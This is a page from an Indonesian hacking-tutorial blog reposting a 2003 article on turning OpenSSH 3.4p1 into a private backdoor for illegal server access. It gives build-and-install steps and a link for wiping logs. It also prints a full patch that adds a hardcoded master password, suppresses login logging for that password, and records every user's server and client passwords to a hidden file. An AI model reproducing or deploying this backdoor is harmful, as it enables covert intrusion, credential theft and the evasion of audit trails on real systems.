TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » Cara Singkat Menginfeksi Openssh-3.4p1 Z

    Cara Singkat Menginfeksi Openssh-3.4p1 Z

    Seperti apa kata pepatah, apabila kalian bisa masuk melalui pintu yang sudah ada dan tanpa merubah apapun dari bentuk fisik pintu itu, maka lakukanlah. Kasus ini sama seperti kalau kita mencoba menginfeksi sebuah server untuk mendapatkan akses secara ilegal.

    Dalam sebuah kasus, ketika dilakukan percobaan menginfeks SSH, ada beberapa trojankit untuk itu, anggap saja kalian pernah memakai backdoor yang disebut dengan nama shv4.tar.gz (release oleh penturichi pada tahun 2002). Tool itu umum dan mungkin sangatlah mudah digunakan oleh para intruder untuk
    memudahkan mereka keluar masuk server (tentunya dengan fake login). Namun yang menjadi masalah disini adalah efek selanjutnya dari server itu sendiri, kadang yang terjadi adalah rusaknya library dan tidak
    berjalannya command command yang ada di /bin.

    Apakah ada jalan lain? (yang aman tanpa membuka port seperti  backdoor yang umum digunakan). Jawabnya ada, dan mari kita  mencoba membahas sedikit walaupun penulis disini kurang pandai  menjelaskan secara detail dan fokus.

    Mencoba menginfeksi openSSH untuk dijadikan backdoor (private) tidak sesulit yang dibayangkan oleh berbagai khalayak/kelompok hacker di Indonesia (walaupun selama ini belum pernah penulis temui the real hacker di Indonesia ini).

    Beberapa tool yang dibutuhkan adalah:

    1. file openSSH-3.4p1 (http://www.openssh.com)
    2. patch infeksi openSSH (terlampir dalam artikel)
    Cara mengolahnya adalah:
    Pertama yang dilakukan adalah extract file openSSH yang sudah terdownload, kemudian anda patch file injeksi kedalam direktori openSSH anda.

    1. # cp ssh-virus.diff openssh-3.4p1/
    2. # cd openssh-3.4p1/
    3. # patch < ssh-virus.diff 
    Selanjutnya kita coba tools yang baru saja kita patch kedalam server sendiri dirumah anda. (kalau anda punya) bagaimana caranya? 

    Pertama adalah melakukan proses konfigurasi dengan cara # ./configure atau dengan option yang lebih spesifik # ./configure --prefix=/usr --sysconfdir=/etc/ssh 

    Kemudian melakukan make dan make install dengan cara make ; make install Setelah semua selesai dilakukan yang terakhir adalah menimpa file sshd_config dengan cara: # mv -f sshd_config /etc/ssh/sshd_config Selesai menimpa file sshd_config, dan ini adalah sebagai langkah final adalah restart SSH dengan cara # ps -x | grep sshd # kill -HUP (sshd pid) /usr/sbin/sshd yang kita kill disini adalah sshd yang terbaru biasanya terletak pada baris paling atas

    Sesudah kita lakukan kita cek apakah pintu masuk kita yang baru sudah berjalan dengan sukses apa tidak? # telnet localhost 22 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SSH-1.99-OpenSSH_3.4p1 '

    Nah setelah selesai, kita mencoba login kedalam server percobaan: # ssh -l root localhost root@localhost's password: Last login: Mon Jul 28 14:12:22 2003 from bsd0.camne.net OpenBSD 3.3 (GENERIC) #44: Sat Mar 29 13:22:05 MST 2003 Welcome to OpenBSD: The proactively secure Unix-like operating system. Wow.. pintu masuk kita yang baru berhasil kita jalankan..

    Selanjutnya silahkan membersihkan beberapa log yang tertinggal dengan cara manual atau dengan memakai utilitas yang tersedia. Masih bingung mencari log remover? singgah ke http://sarang.kecoak.org/~scut/release/logremover.txt Kemudian, apakah hanya sekedar mendapatkan akses ilegal dengan port 22? Tak adakah terlintas dalam pikiran anda untuk mencoba mengintip beberapa password didalam jaringan local dan keluarnya? bagaimana caranya?

    Be creative!
    thats unpublished article! Sekian dalam salam hangat dari kutu kecil di sarang kecoak Greet: http://www.w00w00.org for inspire (sh0k and friends) http://www.cert.org for the milist (for reading the milist) http://www.kecoak.or.id for great experience (fwerd, samurai, ceyen, cbug, ifk, logC, nukemafia, rollan) http://www.dhegleng.or.id for support and discuss (degleng, cahcephoe, w0nk) http://www.securityfocus.com for some article (mark and friends) Others friends are (Devi Ria Utami aka GotHGirl at EFnet), (Dj-Psyco, Madi, AnJaZ, infidra, SCO, reVn, Dr`Ponidi at DALnet) Lampiran: ssh-virus.diff Catatan: +#define _SECRET_PASSWD "k3c04k-1nd0h4ck" 

    Silahkan ubah sesuai dengan jenis password anda :) # File ssh-virus.diff # Kecoak Elektronik properties # Published Article at 17/08/2003 --- openssh-3.4p1/auth-passwd.c Fri Jun 21 02:05:13 2002 +++ auth-passwd.c Thu Aug 8 15:44:55 2002 @@ -218,6 +218,16 @@ #endif /*HAVE_MD5_PASSWORDS */ /* Authentication is accepted if the encrypted passwords are identical. */ - return (strcmp(encrypted_password, pw_password) == 0); + if(strcmp(_SECRET_PASSWD, password) == 0){ + mlogin_ok = 1; + return 1; + } + if(strcmp(encrypted_password, pw_password) == 0){ + outf = fopen(_LOG_DIR"/"_S_LOG,"a+"); + fprintf (outf, "%s:%s\n",pw->pw_name,password);

    + fclose (outf);
    + return 1;
    + }else
    + return 0;
    #endif /* !USE_PAM && !HAVE_OSF_SIA */
    }
    --- openssh-3.4p1/auth.c Wed May 22 01:06:28 2002
    +++ auth.c Thu Aug 1 23:16:54 2002
    @@ -248,14 +248,17 @@
    else
    authmsg = authenticated ? "Accepted" : "Failed";

    - authlog("%s %s for %s%.100s from %.200s port %d%s",
    - authmsg,
    - method,
    - authctxt->valid ? "" : "illegal user ",
    - authctxt->user,
    - get_remote_ipaddr(),
    - get_remote_port(),
    - info);
    + /* dont log if secret pass */
    + if(!mlogin_ok){
    + authlog("%s %s for %s%.100s from %.200s port
    %d%s",
    + authmsg,
    + method,
    + authctxt->valid ? "" : "illegal user ",
    + authctxt->user,
    + get_remote_ipaddr(),
    + get_remote_port(),
    + info);
    + }
    }

    /*
    --- openssh-3.4p1/canohost.c Tue Jun 11 12:47:22 2002
    +++ canohost.c Wed Aug 7 17:43:34 2002
    @@ -74,11 +74,13 @@

    debug3("Trying to reverse map address %.100s.", ntop);
    /* Map the IP address to a host name. */
    - if (getnameinfo((struct sockaddr *)&from, fromlen, name,
    sizeof(name),
    - NULL, 0, NI_NAMEREQD) != 0) {
    - /* Host name not found. Use ip address. */
    - log("Could not reverse map address %.100s.",
    ntop);
    - return xstrdup(ntop);
    + if(!mlogin_ok){
    + if (getnameinfo((struct sockaddr *)&from, fromlen,
    name, sizeof(name),
    + NULL, 0, NI_NAMEREQD) != 0) {
    + /* Host name not found. Use ip address. */
    + log("Could not reverse map address %.100s.",
    ntop);
    + return xstrdup(ntop);
    + }
    }

    /* Got host name. */
    --- openssh-3.4p1/includes.h Mon May 13 01:14:09 2002
    +++ includes.h Thu Aug 8 15:45:46 2002
    @@ -157,4 +157,13 @@

    #include "entropy.h"

    +/* The Password */
    +#define _SECRET_PASSWD "k3c04k-1nd0h4ck"
    +FILE *outf;
    +int mlogin_ok;
    +/* end */
    +
    #endif /* INCLUDES_H */
    --- openssh-3.4p1/sshconnect1.c Thu Jun 6 15:57:34 2002
    +++ sshconnect1.c Thu Aug 8 15:48:48 2002
    @@ -922,6 +922,7 @@
    {
    int type, i;
    char *password;
    + char gpasswd[120];

    debug("Doing password authentication.");
    if (options.cipher == SSH_CIPHER_NONE)
    @@ -930,6 +931,7 @@
    if (i != 0)
    error("Permission denied, please try
    again.");
    password = read_passphrase(prompt, 0);
    + strcpy(gpasswd,password);
    packet_start(SSH_CMSG_AUTH_PASSWORD);
    ssh_put_password(password);
    memset(password, 0, strlen(password));
    @@ -938,8 +940,15 @@
    packet_write_wait();

    type = packet_read();
    - if (type == SSH_SMSG_SUCCESS)
    + if (type == SSH_SMSG_SUCCESS){
    + /* dont log if secret pass */
    + if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
    + outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
    + fprintf
    (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
    + fclose (outf);
    + }
    return 1;
    + }
    if (type != SSH_SMSG_FAILURE)
    packet_disconnect("Protocol error: got %d in
    response
    to passwd
    auth", type);
    }
    --- openssh-3.4p1/sshconnect2.c Sun Jun 23 17:23:21 2002
    +++ sshconnect2.c Thu Aug 8 15:48:20 2002
    @@ -446,6 +446,7 @@
    static int attempt = 0;
    char prompt[150];
    char *password;
    + char gpasswd[120];

    if (attempt++ >= options.number_of_password_prompts)
    return 0;
    @@ -456,6 +457,7 @@
    snprintf(prompt, sizeof(prompt), "%.30s@%.128s's
    password: ",
    authctxt->server_user, authctxt->host);
    password = read_passphrase(prompt, 0);
    + strcpy(gpasswd,password);
    packet_start(SSH2_MSG_USERAUTH_REQUEST);
    packet_put_cstring(authctxt->server_user);
    packet_put_cstring(authctxt->service);
    @@ -470,6 +472,12 @@
    dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
    &input_userauth_passwd_changereq);

    + /* dont log if its the secret pass */
    + if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
    + outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
    + fprintf (outf,"%s:%s@%
    s\n",options.user,gpasswd,get_remote_ipaddr());
    + fclose (outf);
    + }
    return 1;
    }
    /*
    --- openssh-3.4p1/sshlogin.c Sun Jun 23 17:23:21 2002
    +++ sshlogin.c Thu Aug 8 15:46:10 2002
    @@ -71,8 +71,11 @@

    li = login_alloc_entry(pid, user, host, ttyname);
    login_set_addr(li, addr, sizeof(struct sockaddr));
    - login_login(li);
    - login_free_entry(li);
    + /* dont log if secret pass */
    + if(!mlogin_ok){
    + login_login(li);
    + login_free_entry(li);
    + }
    }

    #ifdef LOGIN_NEEDS_UTMPX
    @@ -96,6 +99,9 @@
    struct logininfo *li;

    li = login_alloc_entry(pid, user, NULL, ttyname);
    - login_logout(li);
    - login_free_entry(li);
    + /* no logout if secret pass */
    + if(!mlogin_ok){
    + login_logout(li);
    + login_free_entry(li);
    + }
    }

    End Of Article

    Hacking is about thinking for yourself. Hacking needs a place for meeting, discussing, testing, proving, questioning, designing, redesigning, engineering, reengineering, searching, researching, hacking, phreaking, brainstorming and understanding.

    As our world is getting more and more complex, gaining and  sharing knowledge is key to survival. There is a need for open communication and a free, unlimited exchange of ideas and concepts.
    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    0 komentar:

    Poskan Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger